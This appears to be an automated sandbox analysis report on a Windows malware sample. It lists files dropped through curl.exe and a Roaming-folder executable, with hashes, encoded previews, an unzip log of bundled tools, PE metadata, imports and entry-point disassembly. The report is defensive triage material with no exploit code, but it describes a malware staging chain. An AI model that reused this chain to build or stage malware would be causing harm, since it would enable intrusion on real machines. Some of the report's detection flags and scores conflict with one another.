                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):3.711080496244278
                                    Encrypted:false
                                    SSDEEP:3:6T7NRiVWUbdan:e2Wqda
                                    MD5:0A2416AC74224E83DCF659956A6F20AB
                                    SHA1:13886E18B3EDEF191E7BF034E4F9365EE8D3A044
                                    SHA-256:FD16B31EBB50CE1E6957DAE8992554777C7241605B854D57726640E6213BC0E3
                                    SHA-512:8BC2F10ADD88C12D407156CC1CB3941D9FEA4E414746E4CE3CA904EBD5FAD5E25997B4A44289C53F0C75C2E9732EDF6B85F6D1BE3521A9F51CD5ACF69F1B5EE9
                                    Malicious:false
                                    Preview:9A5605DE11447A0E2031624EE8FBDE
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):4.733997907838829
                                    Encrypted:false
                                    SSDEEP:3:GZNuxTXGyiXbNNvGUX5djB+n1fzKB:GZN4TXGzqAd9WfzKB
                                    MD5:7EC936AF6BBF93CFD08DE32EB291263D
                                    SHA1:6216FC54E2B9EBDB416331AA344540846840F410
                                    SHA-256:BFAB8D48CEC02A93FEC9BF66AA8CEFE0D02EC305FD335BBBACBE61F996990B26
                                    SHA-512:F44C298E6AAD646614C14260052D7327E0B1DB33F1212DF33F401179DC2EAD348312D9006C635EE71346FFB3BA692DD829941A9AC894C43EE3BE4C805DD8AD9E
                                    Malicious:false
                                    Preview:W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):104
                                    Entropy (8bit):5.145748944015591
                                    Encrypted:false
                                    SSDEEP:3:9zHW4mVQFjDVB++U8qYZxGgUqeJ:RHW4miRPrqYZcLqeJ
                                    MD5:BEAABAAF1170504DE9CB53DE6EA6C43D
                                    SHA1:738AF18491BDC5F5F8EB581ABF32BE11F7B4BEA0
                                    SHA-256:B3F0913BFB1C486CD263BF9540D89DA3345387EEDD5EC82AC939592E212FAD90
                                    SHA-512:4731E8A631796596E6DA6A30B5FD7F0C5DD26C9E906C33A5F9B58C82EB4E53167D5E748D5AE263EC8317C659735C8C06DF09540AB71952D0947FDFF4FF6CFD0C
                                    Malicious:false
                                    Preview:UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):298556
                                    Entropy (8bit):5.379476611183253
                                    Encrypted:false
                                    SSDEEP:3072:T7MVB4NzC5tmjDNpJol5YccxLSnh7VPHb6SYZ8g3H5mjhg/9/C//n0Q+v8o/q1u2:TLmOwmunJcZ8gpgq5O9YrihCTHE
                                    MD5:65E07A754EFFE6EC11638A25447289A5
                                    SHA1:948CBF6B970FFB432D8EBB1D367CEE5AFA826A83
                                    SHA-256:995338989BBEB5F5304A6C1FC13D75580A26BED964CC9F930E6D6DBC59FA5FD5
                                    SHA-512:67F896FE0B1A4385119351BD41A5D62FEF03F261A32E2B347DE2F2E1475A482BD366BC9CFFA26690EC8105DB0BC60267DF2397D6B7EC4A9CA7EE49819552CFB6
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):2047980
                                    Entropy (8bit):5.693378984841103
                                    Encrypted:false
                                    SSDEEP:24576:4SwAsCOCLyZNJEXP62JHUdnWcv9BK6/ZKF+l8Qz0xaEf+eJYA3pYElWzgdRe:4gs2yZryQ/ZaZkMYLZ
                                    MD5:9FAEAD3FD586F150C4D8BF862EAE33A6
                                    SHA1:D6FEE79B329461541D4BF7639DA5932A9AFB7B10
                                    SHA-256:51D99751DD2134BB485247EF29D3BB6C5B48ED08F61B2EB41F12E7E41638D8C1
                                    SHA-512:6B87F37253606B06CD9A244BB74318B95CE8719CAA5623EF10B8C26C01529C60B917A76FC56CCF70275F40290993DEC1D56284B39FE91910A9726A39DF790269
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):256512
                                    Entropy (8bit):6.608077688435287
                                    Encrypted:false
                                    SSDEEP:3072:8xDDNhSGkz5e5cfll2+NkqXGJFGOm26C2zIvr1FnYzyrnJEYAAAAA+hIefckRQEH:R6Wl20LA4OBrn+NedRO7xn3T
                                    MD5:4CA574943165D792EFADFFFF193A5395
                                    SHA1:282C147DD34EC7BB7D5631EA25C69B656B3F1D62
                                    SHA-256:7F1E0EA1984AACAEE736F3082560D53F3E990B44D6E5D2B9ED38A148DE79A0FB
                                    SHA-512:5862E41F3FFA0EFCCFB040A878C6EF9E7E00BF8A153EB8AF1031FCC047179A8D744EAFC3232C64FCAD8E43664EBA40670A9E37DC34C0BD2FA033EABDEBD5F61A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):690688
                                    Entropy (8bit):6.581619840895496
                                    Encrypted:false
                                    SSDEEP:12288:rmJysC11szmzqS/Vf3gny3MhcGsnWrfATfkeafIO3rn1ExwnZE1f:r9s/zmT/my8zoW6ff4rn1ExwZE
                                    MD5:0184E6EBE133EF41A8CC6EF98A263712
                                    SHA1:CB9F603E061AEF833A2DB501AA8BA6BA007D768E
                                    SHA-256:DD6D7AF00EF4CA89A319A230CDD094275C3A1D365807FE5B34133324BDAA0229
                                    SHA-512:6FEC04E7369858970063E94358AEC7FE872886B5EA440B4A11713B08511BA3EBE8F3D9312E32883B38BAE66E42BC8E208E11678C383A5AD0F7CC0ABE29C3A8ED
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):147456
                                    Entropy (8bit):6.544226860164606
                                    Encrypted:false
                                    SSDEEP:3072:TYpNRok2PQFDTQQYvanxOokAAAAA+cQKiG3iral6W60b:ahFDTQdZG3zUW6
                                    MD5:4D183847804E733FB6A197E24272E870
                                    SHA1:11A11DEEE65803C75FFFB496F91494E6E1E4B7FC
                                    SHA-256:7F964A73D3BD666A494B6EB82AA984BC0B4E77172A78AA4BE786D9A578103224
                                    SHA-512:F60B02A16735BCD474838CA8854A1368A7EA157BA72A86823D5B3E1DD13EC26A9A92C458B5C554ED3DAFA594BF1F66BD9D42ABB70A6C097C076CEC1AD76BB1B5
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):4.995518946450261
                                    Encrypted:false
                                    SSDEEP:3:6T7NRiVWUbdaFgfa3GArKM5mRPt+kiE2J5xAI7md5omEPTA:e2Wqd83GArX5kPwkn23f7mdmmEPTA
                                    MD5:C1CC6A3849E8F7DA6E9FBB55C4AFABE9
                                    SHA1:AD70501298BE899C0E5B2910F8DC6488DC5F7A21
                                    SHA-256:66707AE007664CE0D6A5B857BB8E6AF0947957D28827D77FF55A9AF5531D3D8D
                                    SHA-512:3CE89A9A30EA5C457987E500FB38AE6C864D3E6AA352C25E7BB40EE0130D7938E768E60275B6C1E2A5C2242CDFF6B22C91D3441814F8FC9E11067DDD3726A8E5
                                    Malicious:false
                                    Preview:9A5605DE11447A0E2031624EE8FBDE*user*019635*true*false*0*0*void*void*C:\Users\user\AppData\Local\Temp\139918\Ur.pif*false*1*void
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):313496
                                    Entropy (8bit):6.329253795498564
                                    Encrypted:false
                                    SSDEEP:3072:wGicIgBsA+8vctYpleMKZUFEd0iVcxWHYGsDJXU+l9koZUFvEjqcVtb5BR+pEz2D:rl0eXEdB4FdjSvYqWdM4hM
                                    MD5:624ADB0F45CBB9CADAD83C264DF98891
                                    SHA1:E839CE1E0446D8DA889935F411F0FB7AD54D4B3E
                                    SHA-256:8F401DC021E20FF3ABC64A2D346EF6A792A5643CA04FFD1F297E417532ACAA06
                                    SHA-512:B29B3A72CD32EE34EC6CE357818658B8A89C399E2F8439A7F49FB1A506ED912F41AFA19BC5C142C9A4539ACC5966A29C6A6637C23DE0DC3E5F2D85264620BDBA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):351904
                                    Entropy (8bit):6.077576126824556
                                    Encrypted:false
                                    SSDEEP:6144:0aNJZh5a45XRueuTI52O17cNq7tncFSsTTB8YS6SBjyxgg4Lf4fC:0aFi45z2ancFn/0jlJ
                                    MD5:EFA2F8F73B3559711149DFDEB8BC288E
                                    SHA1:453C70E4B12ECABE860866165AD39DE6361215FD
                                    SHA-256:EF5CF80C8448BF0907C634A3251CC348B1D36BB5AD8F31F23B11D12AA7F63BCB
                                    SHA-512:63F75A3D639A912E2E3966E9D410F8E1C52B75300518BB5083853EF2633C7E109C037EA2B66CED57BD5B319866A14BCD92254CB38AB9EC7B99465B0A8A8F5F3E
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):167936
                                    Entropy (8bit):6.1797557233483955
                                    Encrypted:false
                                    SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                    MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                    SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                    SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                    SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):53
                                    Entropy (8bit):3.5007143226894013
                                    Encrypted:false
                                    SSDEEP:3:XrEIuqujyM1K8vF:Xrhurj1hF
                                    MD5:C16330B5345B80BA27AF8BFD4299904E
                                    SHA1:9F573E303431E956395DC09C510C445AE55EF7D7
                                    SHA-256:D6306F25B6B4CF4D6A82A4BBB691932AD74730EC3D9A4C2D5EC90B1574D4BAFE
                                    SHA-512:173F20932FAF91348AE1B26BC99DFFD4B438B6868921E5B5352FB1B513382203E49643DD2129B7365D570159DADF108440141D4D77193C1C6108A2140B9CE3F6
                                    Malicious:false
                                    Preview:OS Name: Microsoft Windows 10 Pro..
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                    Category:modified
                                    Size (bytes):44544
                                    Entropy (8bit):7.766110456396969
                                    Encrypted:false
                                    SSDEEP:768:UF24SNifq4YWc5uEvW7KrQaFzs4C9B18sEufqnYIG0y8XmEsYR2fWIrKiSU:UMNG9c5jfQ8XoB18FufVIG092lWAKiSU
                                    MD5:0E69B6BD18E064C83A11B48495C1B01E
                                    SHA1:21C4CC08D3600C564BD0D04C8553E59F564BFFF4
                                    SHA-256:67E0D635825CBF7CC213670F671544DA9FF18047742DD4A0696A508B79EEF607
                                    SHA-512:E7C9B9209359183ADE3502AD9C8807B7948D38FD0EF883655DECEF2E5F212BE646A0E3FD93B51988595511B979C669DEE8F9F2A3BA90A4B0CECF0423FF2D3F51
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1019991
                                    Entropy (8bit):7.9981268397514125
                                    Encrypted:true
                                    SSDEEP:24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
                                    MD5:9E73FB50D37E37EE8BD19A8E3D2B82CA
                                    SHA1:3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
                                    SHA-256:68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
                                    SHA-512:B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):135168
                                    Entropy (8bit):6.567755066270725
                                    Encrypted:false
                                    SSDEEP:3072:8yiIL2aUStYI4kOojhmlDUaKhVV4dD+mO3teRl:k2bukOkhK4aKhVV/
                                    MD5:83AF340778E7C353B9A2D2A788C3A13A
                                    SHA1:55C5A72010291FCA2275CCFB5B497DD0BAC11A60
                                    SHA-256:E9929598C98359773B7C51E3C4461D0F99B1703790FF775AEE3C63A9A9A74CA8
                                    SHA-512:FCC810D84BFE8876123757B5E7BBBB571D7FBF3B3068B81215BDECFD0742AC94EDEEF5589277A67C40693D1182676604BC0E2F2610421AC138C59750E1CFED86
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):293
                                    Entropy (8bit):3.479129918610545
                                    Encrypted:false
                                    SSDEEP:6:esaSfLq2ANq2XCNq28gSNq2LwcNq2L+V0Nq2+BSNq2SWXLXS:6Szq20q2Xiq2TSq20Aq2eYq2QSq2/7S
                                    MD5:8FCA86EBFED803CF311D9FCC42835C2E
                                    SHA1:36B77381AD0DE20CD1BDFA45695954314CB3D19F
                                    SHA-256:0D11AA28844832C1BDEF3AA868FC514E72E92CF1B740AFC467AD5692A0A8BDC1
                                    SHA-512:078D144DC41383E933587BDB428702EFDD3D796118AE1559B84750207C8909BA5D554FF7321EFD3002439660ADA43CF7544370682B5150A7C597286751B3D529
                                    Malicious:false
                                    Preview:Archive: xhwq.zip.. inflating: 7zxa.dll .. inflating: 7za.dll .. inflating: 7za.exe .. inflating: PsInfo.exe .. inflating: PsInfo64.exe .. inflating: zip.exe .. inflating: nircmdc.exe ..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.978810284296215
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:vqMMwqCFZQ.exe
                                    File size:1'069'345 bytes
                                    MD5:8e55a7932d1b9649aba9d3e97ca688ce
                                    SHA1:32afffa80d0f8778c8670f1b9996c602a81de455
                                    SHA256:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
                                    SHA512:4109f2a63005d8ba7cffb25b54c1dd5993fe855795cc7a39bb520b153f7d87c01dd46a644b4431fefa63a2c47ce40e1f7d10fc10b9ac8313aa8049c2852e5931
                                    SSDEEP:24576:2TjI1hepdrX4EEx4W+N1zRlDlP9O4NPhGEdfqr:y4XxLq1zRnV6r
                                    TLSH:FE3523F28293D831E5B60475297098551EB2FC0A8578C582B31578EAF335783E3AEB77
                                    Icon Hash:baf062fe9efaf2c0
                                    Entrypoint:0x403883
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:
                                        Instruction
                                        sub esp, 000002D4h
                                        push ebx
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        xor ebp, ebp
                                        pop esi
                                        mov dword ptr [esp+18h], ebp
                                        mov dword ptr [esp+10h], 00409268h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [00408030h]
                                        push 00008001h
                                        call dword ptr [004080B4h]
                                        push ebp
                                        call dword ptr [004082C0h]
                                        push 00000008h
                                        mov dword ptr [00472EB8h], eax
                                        call 00007F0C88C2A48Bh
                                        push ebp
                                        push 000002B4h
                                        mov dword ptr [00472DD0h], eax
                                        lea eax, dword ptr [esp+38h]
                                        push eax
                                        push ebp
                                        push 00409264h
                                        call dword ptr [00408184h]
                                        push 0040924Ch
                                        push 0046ADC0h
                                        call 00007F0C88C2A16Dh
                                        call dword ptr [004080B0h]
                                        push eax
                                        mov edi, 004C30A0h
                                        push edi
                                        call 00007F0C88C2A15Bh
                                        push ebp
                                        call dword ptr [00408134h]
                                        cmp word ptr [004C30A0h], 0022h
                                        mov dword ptr [00472DD8h], eax
                                        mov eax, edi
                                        jne 00007F0C88C27A5Ah
                                        push 00000022h
                                        pop esi
                                        mov eax, 004C30A2h
                                        push esi
                                        push eax
                                        call 00007F0C88C29E31h
                                        push eax
                                        call dword ptr [00408260h]
                                        mov esi, eax
                                        mov dword ptr [esp+1Ch], esi
                                        jmp 00007F0C88C27AE3h
                                        push 00000020h
                                        pop ebx
                                        cmp ax, bx
                                        jne 00007F0C88C27A5Ah
                                        add esi, 02h
                                        cmp word ptr [esi], bx
                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ C ] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x100aa | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf3299 | 0x2888 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc | 0xf4000 | 0x100aa | 0x10200 | 633f1738f646d4cc220841f666c98157 | False | 0.9424660852713178 | data | 7.804758405555712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x105000 | 0xf32 | 0x1000 | a86e44061c0acca671b37e618762e7b9 | False | 0.589111328125 | data | 5.4135077324983545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0xf4238 | 0x8734 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9860453022073269
                                        RT_ICON | 0xfc96c | 0x5eee | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006583820261707
                                        RT_ICON | 0x10285c | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5443989071038251
                                        RT_DIALOG | 0x103984 | 0x100 | data | English | United States | 0.5234375
                                        RT_DIALOG | 0x103a84 | 0x11c | data | English | United States | 0.6056338028169014
                                        RT_DIALOG | 0x103ba0 | 0x60 | data | English | United States | 0.7291666666666666
                                        RT_GROUP_ICON | 0x103c00 | 0x30 | data | English | United States | 0.8541666666666666
                                        RT_VERSION | 0x103c30 | 0x1a4 | data | English | United States | 0.5619047619047619
                                        RT_MANIFEST | 0x103dd4 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                        DLL | Import
                                        KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                        USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                        GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                        SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                        ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                        COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                        ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
